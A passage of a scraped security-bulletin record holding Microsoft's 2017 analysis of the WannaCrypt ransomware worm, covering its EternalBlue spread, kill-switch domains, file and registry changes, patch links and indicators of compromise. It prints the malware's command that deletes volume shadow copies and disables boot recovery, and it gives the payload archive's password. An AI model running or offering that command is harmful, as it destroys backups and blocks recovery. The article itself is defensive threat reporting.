x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nCustomer guidance for WannaCrypt attacks: <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\n## Indicators of compromise\n\nSHA1 of samples analyzed:\n\n * 51e4307093f8ca8854359c0ac882ddca427a813c\n * e889544aff85ffaf8b0d0da705105dee7c97fe26\n\nFiles created:\n\n * %SystemRoot%\\mssecsvc.exe\n * %SystemRoot%\\tasksche.exe\n * %SystemRoot%\\qeriuwjhrf\n * b.wnry\n * c.wnry\n * f.wnry\n * r.wnry\n * s.wnry\n * t.wnry\n * u.wnry\n * taskdl.exe\n * taskse.exe\n * 00000000.eky\n * 00000000.res\n * 00000000.pky\n * @WanaDecryptor@.exe\n * @Please_Read_Me@.txt\n * m.vbs\n * @WanaDecryptor@.exe.lnk\n * @WanaDecryptor@.bmp\n * 274901494632976.bat\n * taskdl.exe\n * Taskse.exe\n * Files with \".wnry\" extension\n * Files with \".WNCRY\" extension\n\nRegistry keys created:\n\n * HKLM\\SOFTWARE\\WanaCrypt0r\\wd\n\n \n\n \n\n_Karthik Selvaraj, Elia Florio, Andrea Lelli, and Tanmay Ganacharya ([@tanmayg](<https://twitter.com/tanmayg>))_ \n_Microsoft Malware Protection Center ([@msftmmpc](<https://twitter.com/msftmmpc>))_\n\n \n\nRelated blog entries:\n\n[Windows 10 Creators Update provides next-gen ransomware protection](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)\n\n[Analysis of the ETERNALBLUE and ETERNALROMANCE exploits leaked by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\n\n \n\nUpdates:\n\nJune 20, 2017 - added reference to analysis of exploits leaked by Shadow Brokers", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", "id": "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "lastseen": "2017-06-30T15:02:20", "modified": "2017-05-13T06:40:39", "objectVersion": "1.4", "published": "2017-05-13T06:40:39", "references": [], "reporter": "msft-mmpc", "title": "WannaCrypt ransomware worm targets out-of-date systems", "type": "mmpc", "viewCount": 0}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-06-30T15:02:20"}], "modified": "2017-05-13T06:40:39", "lastseen": "2017-09-15T09:08:41", "published": "2017-05-13T06:40:39", "description": "_(Note: Read our latest comprehensive report on ransomware: _[**_Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene_**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>)_.)_\n\n \n\nOn May 12, 2017 we detected a new ransomware that spreads like a worm by leveraging vulnerabilities that have been previously fixed. While security updates are automatically applied in most computers, some users and enterprises may delay deployment of patches. Unfortunately, the ransomware, known as [WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>), appears to have affected computers that have not applied the patch for these vulnerabilities. While the attack is unfolding, we remind users to install [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) if they have not already done so.\n\nMicrosoft antimalware telemetry immediately picked up signs of this campaign. Our expert systems gave us visibility and context into this new attack as it happened, allowing [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) to deliver real-time defense. Through automated analysis, machine learning, and predictive modeling, we were able to rapidly protect against this malware.\n\nIn this blog, we provide an early analysis of the end-to-end ransomware attack. Please note this threat is still under investigation. The attack is still active, and there is a possibility that the attacker will attempt to react to our detection response.\n\n## Attack vector\n\nRansomware threats do not typically spread rapidly. Threats like WannaCrypt (also known as WannaCry, WanaCrypt0r, WCrypt, or WCRY) usually leverage social engineering or email as primary attack vector, relying on users downloading and executing a malicious payload. However, in this unique case, the ransomware perpetrators used publicly available exploit code for the patched SMB \"[EternalBlue](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\" vulnerability, [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which can be triggered by sending a specially crafted packet to a targeted SMBv1 server. This vulnerability was fixed in security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), which was released on March 14, 2017.\n\nWannaCrypt\u2019s spreading mechanism is borrowed from [well-known](<https://packetstormsecurity.com/files/142464/MS17-010-SMBv1-SrvOs2FeaToNt-OOB-Remote-Code-Execution.html>) [public SMB exploits](<https://github.com/RiskSense-Ops/MS17-010>), which armed this regular ransomware with worm-like functionalities, creating an entry vector for machines still unpatched even after the fix had become available.\n\nThe exploit code used by WannaCrypt was designed to work only against unpatched Windows 7 and Windows Server 2008 (or earlier OS) systems, so [Windows 10 PCs are not affected by this attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\nWe haven\u2019t found evidence of the exact initial entry vector used by this threat, but there are two scenarios that we believe are highly possible explanations for the spread of this ransomware:\n\n * Arrival through social engineering emails designed to trick users to run the malware and activate the worm-spreading functionality with the SMB exploit\n * Infection through SMB exploit when an unpatched computer is addressable from other infected machines\n\n## Dropper\n\nThe threat arrives as a dropper Trojan that has the following two components:\n\n 1. A component that attempts to exploit the SMB CVE-2017-0145 vulnerability in other computers\n 2. The ransomware known as WannaCrypt\n\nThe dropper tries to connect the following domains using the _API InternetOpenUrlA()_:\n\n * www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[.]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[x].iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]test\n\nIf connection to the domains is successful, the dropper does not infect the system further with ransomware or try to exploit other systems to spread; it simply stops execution. However, if the connection fails, the threat proceeds to drop the ransomware and creates a service on the system.\n\nIn other words, unlike in most malware infections, **IT Administrators should NOT block these domains**. Note that the malware is not proxy-aware, so a local DNS record may be required. This does not need to point to the Internet, but can resolve to any accessible server which will accept connections on TCP 80.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png>)[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt1.png>)\n\nThe threat creates a service named _mssecsvc2.0_, whose function is to exploit the SMB vulnerability in other computers accessible from the infected system:\n\n_Service Name: mssecsvc2.0_ \n_Service Description: (Microsoft Security Center (2.0) Service)_ \n_Service Parameters: \u201c-m security\u201d_\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png>)\n\n## WannaCrypt ransomware\n\nThe ransomware component is a dropper that contains a password-protected .zip archive in its resource section. The document encryption routine and the files in the .zip archive contain support tools, a decryption tool, and the ransom message. In the samples we analyzed, the password for the .zip archive is \"WNcry@2ol7\".\n\nWhen run, WannaCrypt creates the following registry keys:\n\n * _HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\\\&lt;random string&gt; = \"&lt;malware working directory&gt;\\tasksche.exe\"_\n * _HKLM\\SOFTWARE\\WanaCrypt0r\\\\\\wd = \"&lt;malware working directory&gt;\"_\n\nIt changes the wallpaper to a ransom message by modifying the following registry key:\n\n * _HKCU\\Control Panel\\Desktop\\Wallpaper: \"&lt;malware working directory&gt;\\@WanaDecryptor@.bmp\"_\n\nIt creates the following files in the malware's working directory:\n\n * _00000000.eky_\n * _00000000.pky_\n * _00000000.res_\n * _274901494632976.bat_\n * _@Please_Read_Me@.txt_\n * _@WanaDecryptor@.bmp_\n * _@WanaDecryptor@.exe_\n * _b.wnry_\n * _c.wnry_\n * _f.wnry_\n * _m.vbs_\n * _msg\\m_bulgarian.wnry_\n * _msg\\m_chinese (simplified).wnry_\n * _msg\\m_chinese (traditional).wnry_\n * _msg\\m_croatian.wnry_\n * _msg\\m_czech.wnry_\n * _msg\\m_danish.wnry_\n * _msg\\m_dutch.wnry_\n * _msg\\m_english.wnry_\n * _msg\\m_filipino.wnry_\n * _msg\\m_finnish.wnry_\n * _msg\\m_french.wnry_\n * _msg\\m_german.wnry_\n * _msg\\m_greek.wnry_\n * _msg\\m_indonesian.wnry_\n * _msg\\m_italian.wnry_\n * _msg\\m_japanese.wnry_\n * _msg\\m_korean.wnry_\n * _msg\\m_latvian.wnry_\n * _msg\\m_norwegian.wnry_\n * _msg\\m_polish.wnry_\n * _msg\\m_portuguese.wnry_\n * _msg\\m_romanian.wnry_\n * _msg\\m_russian.wnry_\n * _msg\\m_slovak.wnry_\n * _msg\\m_spanish.wnry_\n * _msg\\m_swedish.wnry_\n * _msg\\m_turkish.wnry_\n * _msg\\m_vietnamese.wnry_\n * _r.wnry_\n * _s.wnry_\n * _t.wnry_\n * _TaskData\\Tor\\libeay32.dll_\n * _TaskData\\Tor\\libevent-2-0-5.dll_\n * _TaskData\\Tor\\libevent_core-2-0-5.dll_\n * _TaskData\\Tor\\libevent_extra-2-0-5.dll_\n * _TaskData\\Tor\\libgcc_s_sjlj-1.dll_\n * _TaskData\\Tor\\libssp-0.dll_\n * _TaskData\\Tor\\ssleay32.dll_\n * _TaskData\\Tor\\taskhsvc.exe_\n * _TaskData\\Tor\\tor.exe_\n * _TaskData\\Tor\\zlib1.dll_\n * _taskdl.exe_\n * _taskse.exe_\n * _u.wnry_\n\nWannaCrypt may also create the following files:\n\n * _%SystemRoot%\\tasksche.exe_\n * _%SystemDrive%\\intel\\&lt;random directory name&gt;\\tasksche.exe_\n * _%ProgramData%\\&lt;random directory name&gt;\\tasksche.exe_\n\nIt may create a randomly named service that has the following associated ImagePath: _\"cmd.exe /c \"&lt;malware working directory&gt;\\tasksche.exe\"\"_.\n\nIt then searches the whole computer for any file with any of the following file name extensions: _.123, .jpeg , .rb , .602 , .jpg , .rtf , .doc , .js , .sch , .3dm , .jsp , .sh , .3ds , .key , .sldm , .3g2 , .lay , .sldm , .3gp , .lay6 , .sldx , .7z , .ldf , .slk , .accdb , .m3u , .sln , .aes , .m4u , .snt , .ai , .max , .sql , .ARC , .mdb , .sqlite3 , .asc , .mdf , .sqlitedb , .asf , .mid , .stc , .asm , .mkv , .std , .asp , .mml , .sti , .avi , .mov , .stw , .backup , .mp3 , .suo , .bak , .mp4 , .svg , .bat , .mpeg , .swf , .bmp , .mpg , .sxc , .brd , .msg , .sxd , .bz2 , .myd , .sxi , .c , .myi , .sxm , .cgm , .nef , .sxw , .class , .odb , .tar , .cmd , .odg , .tbk , .cpp , .odp , .tgz , .crt , .ods , .tif , .cs , .odt , .tiff , .csr , .onetoc2 , .txt , .csv , .ost , .uop , .db , .otg , .uot , .dbf , .otp , .vb , .dch , .ots , .vbs , .der\" , .ott , .vcd , .dif , .p12 , .vdi , .dip , .PAQ , .vmdk , .djvu , .pas , .vmx , .docb , .pdf , .vob , .docm , .pem , .vsd , .docx , .pfx , .vsdx , .dot , .php , .wav , .dotm , .pl , .wb2 , .dotx , .png , .wk1 , .dwg , .pot , .wks , .edb , .potm , .wma , .eml , .potx , .wmv , .fla , .ppam , .xlc , .flv , .pps , .xlm , .frm , .ppsm , .xls , .gif , .ppsx , .xlsb , .gpg , .ppt , .xlsm , .gz , .pptm , .xlsx , .h , .pptx , .xlt , .hwp , .ps1 , .xltm , .ibd , .psd , .xltx , .iso , .pst , .xlw , .jar , .rar , .zip , .java , .raw._\n\nWannaCrypt encrypts all files it finds and renames them by appending _.WNCRY_ to the file name. For example, if a file is named _picture.jpg_, the ransomware encrypts and renames the file to _picture.jpg.WNCRY_.\n\nThis ransomware also creates the file _@Please_Read_Me@.txt_ in every folder where files are encrypted. The file contains the same ransom message shown in the replaced wallpaper image (see screenshot below).\n\nAfter completing the encryption process, the malware deletes the volume shadow copies by running the following command:\n\n_cmd.exe /c vssadmin delete shadows /all /quiet &amp; wmic shadowcopy delete &amp; bcdedit /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no &amp; wbadmin delete catalog -quiet_\n\nIt then replaces the desktop background image with the following message:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png>)\n\nIt also runs an executable showing a ransom note which indicates a $300 ransom in Bitcoins as well as a timer:\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png>)\n\nThe text is localized into the following languages: Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, and Vietnamese.\n\nThe ransomware also demonstrates the decryption capability by allowing the user to decrypt a few random files, free of charge. It then quickly reminds the user to pay the ransom to decrypt all the remaining files.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png>)\n\n## Spreading capability\n\nThe worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host, which can be observed by SecOps personnel, as shown below.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png>)\n\nThe Internet scanning routine randomly generates octets to form the IPv4 address. The malware then targets that IP to attempt to exploit CVE-2017-0145. The threat avoids infecting the IPv4 address if the randomly generated value for first octet is 127 or if the value is equal to or greater than 224, in order to skip local loopback interfaces. Once a vulnerable machine is found and infected, it becomes the next hop to infect other machines. The vicious infection cycle continues as the scanning routing discovers unpatched computers.\n\nWhen it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that seems to have been copied from the public backdoor known as DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png>)\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png>)\n\n## Protection against the WannaCrypt attack\n\nTo get the latest protection from Microsoft, upgrade to [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>). Keeping your computers [up-to-date](<https://www.microsoft.com/en-us/security/portal/mmpc/help/updatefaqs.aspx>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows.\n\nWe recommend customers that have not yet installed the security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\n[Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects this threat as [Ransom:Win32/WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>) as of the _1.243.297.0_ update. Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nUse [Office 365 Advanced Threat Protection](<https://blogs.office.com/2015/04/08/introducing-exchange-online-advanced-threat-protection/>), which has machine learning capability that blocks dangerous email threats, such as the emails carrying ransomware.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nCustomer guidance for WannaCrypt attacks: <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\n## Indicators of compromise\n\nSHA1 of samples analyzed:\n\n * 51e4307093f8ca8854359c0ac882ddca427a813c\n * e889544aff85ffaf8b0d0da705105dee7c97fe26\n\nFiles created:\n\n * %SystemRoot%\\mssecsvc.exe\n * %SystemRoot%\\tasksche.exe\n * %SystemRoot%\\qeriuwjhrf\n * b.wnry\n * c.wnry\n * f.wnry\n * r.wnry\n * s.wnry\n * t.wnry\n * u.wnry\n * taskdl.exe\n * taskse.exe\n * 00000000.eky\n * 00000000.res\n * 00000000.pky\n * @WanaDecryptor@.exe\n * @Please_Read_Me@.txt\n * m.vbs\n * @WanaDecryptor@.exe.lnk\n * @WanaDecryptor@.bmp\n * 274901494632976.bat\n * taskdl.exe\n * Taskse.exe\n * Files with \".wnry\" extension\n * Files with \".WNCRY\" extension\n\nRegistry keys created:\n\n * HKLM\\SOFTWARE\\WanaCrypt0r\\wd\n\n \n\n \n\n_Karthik Selvaraj, Elia Florio, Andrea Lelli, and Tanmay Ganacharya ([@tanmayg](<https://twitter.com/tanmayg>))_ \n_Microsoft Malware Protection Center ([@msftmmpc](<https://twitter.com/msftmmpc>))_\n\n \n\nRelated blog entries:\n\n[Windows 10 Creators Update provides next-gen ransomware protection](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)\n\n[Analysis of the ETERNALBLUE and ETERNALROMANCE exploits leaked by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\n\n \n\nUpdates:\n\nJune 20, 2017 - added reference to analysis of exploits leaked by Shadow Brokers", "title": "WannaCrypt ransomware worm targets out-of-date systems", "cvelist": ["CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 245, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-09-15T09:08:41", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2017-09-15T09:08:41", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "ffe6cb6fb3b4433654ce1ac7d3d0f70bb6f55b5c0d3112727381b9d8896a525f", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "e8ece5e56bdd3732ba7cab6279f9f4ba"}, {"key": "href", "hash": "7ffd9eda0c71ce3b65053213385512d5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "2539359a3785695f4c56ccf35c614000"}, {"key": "published", "hash": "2539359a3785695f4c56ccf35c614000"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "69654611badaced3e365c04618737412"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "MMPC:C211C70545FBDF88C2F99362DC4608A8", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "\n\nOn April 14, a group calling themselves the Shadow Brokers caught the attention of the security community by [releasing a set of weaponized exploits](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>). Shortly thereafter, one of these exploits was used to create wormable malware that we now know as 